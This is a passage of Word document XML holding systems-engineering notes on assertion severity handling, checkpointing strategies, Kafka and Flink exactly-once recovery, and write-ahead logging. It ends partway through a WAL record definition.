    <w:p w14:paraId="3516D7A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Assertion violation handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C08FE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Severity 1 (data integrity, business logic): crash immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD1E4A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Better to crash than continue with corrupt state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C7443" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Crash produces core dump + alerting → fast investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524519A3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF56040" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Severity 2 (unexpected but recoverable): log + alert + return error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A4F84" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Record the violation for investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464953BE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Return error to caller (don't corrupt downstream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E833B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D34CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Severity 3 (degraded but acceptable): log + metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF18BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Track frequency of violation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D646E44" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Alert if frequency exceeds threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6E041" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="539284F3">
          <v:rect id="_x0000_i6441" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435BDE9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Recovery — Restoring Correct Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC35224" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checkpointing and Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32DA6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level checkpointing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2514B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C256331" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Checkpoint: snapshot of application state at a specific point in time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B2A71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Purpose: restart from checkpoint rather than beginning after failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177EA26" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="105E7705" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1308B72D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5067E598" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>1. Coordinated checkpointing (simple but blocking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFC8CE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   All processes pause simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70275B0D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Each writes its state to stable storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD0838" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Resume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9127FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB7A7A5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Problem: coordination overhead, blocking pause (unavailability during checkpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A72827" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Use: single-machine systems, periodic batch jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC3763" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA594ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>2. Uncoordinated checkpointing (distributed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F1846" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Each process checkpoints independently at different times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762F68C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   On recovery: find consistent cut across all checkpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99066A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97FB21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Consistent cut: a set of checkpoint versions where no message was sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A0D09" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   after one checkpoint but received before another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22E96A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55614480" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Domino effect: may need to roll back further than the last checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8DB6CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   to find a consistent cut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA70D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B80C47" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Message logging: record all messages sent/received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBB24C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Recovery: restore checkpoint + replay logged messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB3D16B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0675DE7A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>3. Message logging + checkpointing (production approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E4914F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Checkpoint application state every T seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A77D3C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Log every state-changing event to durable storage (WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C3240" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A097B8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   On failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E938D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Load last checkpoint (application state at time T0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536AFDB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Replay WAL from T0 to failure time T1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0521EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Application state restored to T1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F351DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298AA83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Recovery time: checkpoint load time + WAL replay time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D2169F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Checkpoint frequency vs recovery time tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA799F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Checkpoint every 1 minute: replay ≤ 1 minute of events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D8BAE0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Checkpoint every 1 hour: replay ≤ 1 hour of events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508615B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FBEE83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Database analogy: PostgreSQL checkpoint + WAL replay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9FA0B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Application analogy: Flink/Spark checkpointing for stream processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA6BC2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="2F04E3AB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Kafka consumer checkpointing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EEA11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Consumer reads from Kafka topic at specific offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10866AF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Checkpoint: record "I have processed up to offset N"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC14E16" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD4DC1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  On consumer crash + restart:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC9B97" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Read last committed offset N from Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9A55B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Seek to offset N+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C796210" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Resume processing (may reprocess some events if checkpoint was delayed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B3B6A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447349BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Exactly-once semantics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E09122" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Store offset atomically with the business state change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C850A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    If storing to database: write event and offset in same transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8B99C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → On restart: read offset from database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F55B82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Events processed before crash have been committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C448CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Events after offset reprocessed (but idempotent → correct)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192960ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63781B05" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Flink checkpointing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B16E21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Barrier-based: inject "barrier" messages into Kafka streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA9D43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    When all operators receive barrier for checkpoint N:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CFF2CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Pause processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA265AF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Snapshot operator state to distributed storage (HDFS, S3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0023C1CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Acknowledge checkpoint N to Flink master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE4CB4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63618BED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Recovery: restore state from last successful checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041F8F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Exactly-once: Kafka offset included in checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8C47D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Resume: from the offset in the checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B96E86B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Ahead Logging (WAL) — the universal recovery primitive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F3832" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBC296" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>WAL principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3764C7F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Before modifying any persistent data: record the modification in the log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30580F8B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Log is sequential (fast writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5925E8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data modification can be to random locations (slower, but async)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20100A07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D72BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  On crash: replay log from last checkpoint → reconstruct in-memory state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76072EA5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95716C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>WAL record structure (simplified):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CEAEA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423CF311" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    lsn:           uint64  // Log Sequence Number (monotonic, unique)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745A7C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    transaction_id: uint32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06420D2E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    record_type:   enum {BEGIN, INSERT, UPDATE, DELETE, COMMIT, ABORT, CHECKPOINT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0064AB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    table_id:      uint32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D22CE7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    tuple_id:      uint64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B584721" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
